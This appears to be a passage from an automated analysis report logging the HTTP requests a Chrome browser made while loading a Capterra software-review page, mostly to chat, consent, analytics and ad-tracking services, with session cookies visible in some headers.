AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
        Source: global trafficHTTP traffic detected: GET /activityi;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: 8036043.fls.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
        Source: global trafficHTTP traffic detected: GET /core/assets/css/8.6ac3976b.chunk.css HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/css/16.22abfce0.chunk.css HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/52.b1edaf4a.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/37.b6614199.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/22.6b9a301a.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/19.6f85b843.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripttemplates/otSDKStub.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/989b7b21-d05b-49b3-9b8a-3dbec459287a.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripttemplates/202403.2.0/otBannerSdk.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /include/1725034800000/5amzsk8w99z9.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /web-vitals@4.2.3/dist/web-vitals.iife.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /us1/v5/datadog-rum.js HTTP/1.1Host: www.datadoghq-browser-agent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/runtime~main.72ecb88a.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/main~493df0b3.8510c064.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/9.4a3e9801.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /activityi;dc_pre=CI_uo9mOnYgDFU1OpAQdGH4MHw;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: 8036043.fls.doubleclick.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUnLy_oPAn3RQQGGTmGl0tTHi6Y8gDLMzI9EgAmspRIPtsEqTf9uSmtnMP0T6D4
        Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072635088/?random=1725034607177&cv=11&fst=1725033600000&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfreFr7UMJUwrxjcQQl0sATJa54prevAhrBa7LzEOEJMNWOgdD&random=2594997369&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /modal/6HyOcTRcBkZLAc2QGex3tl?formId=6HyOcTRcBkZLAc2QGex3tl HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /modal/7DbjmVSFi4BGlfm43ATGbM?formId=7DbjmVSFi4BGlfm43ATGbM HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072635088/?random=1725034607177&cv=11&fst=1725034607177&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /modal/3ob5sl3RSLbslH6LvzUKQc?formId=3ob5sl3RSLbslH6LvzUKQc HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /faas-modal-payload.js?formId=6HyOcTRcBkZLAc2QGex3tl HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034608.59.0.0
        Source: global trafficHTTP traffic detected: GET /faas-modal-payload.js?formId=7DbjmVSFi4BGlfm43ATGbM HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034608.59.0.0
        Source: global trafficHTTP traffic detected: GET /faas-modal-payload.js?formId=3ob5sl3RSLbslH6LvzUKQc HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034608.59.0.0
        Source: global trafficHTTP traffic detected: GET /core/assets/js/43.7ac85d58.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/19.6f85b843.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/20.8c21ea18.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/52.b1edaf4a.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jserrors/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=76603&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
        Source: global trafficHTTP traffic detected: GET /core/assets/js/26.04e7f30b.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/14.e24a6190.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/11.639238ba.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/18.9c1bd1fb.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
